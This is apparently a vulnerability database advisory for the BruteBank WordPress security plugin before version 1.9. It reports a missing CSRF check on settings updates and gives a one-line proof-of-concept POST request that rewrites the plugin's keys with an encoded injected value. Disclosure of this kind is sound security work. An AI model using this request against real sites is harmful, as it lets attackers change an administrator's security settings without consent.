WordPress Plugin Vulnerabilities
BruteBank - WP Security & Firewall < 1.9 - Settings Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
Proof of Concept
POST /wp-admin/admin.php?page=brutebank-settings HTTP/1.1 public_key=site.a%22%2522aaaa%3Daaa&secret_key=aaa&update=Update
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
rezaduty
Submitter
rezaduty
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-28 (about 1 years ago)
Added
2022-12-28 (about 1 years ago)
Last Updated
2022-12-28 (about 1 years ago)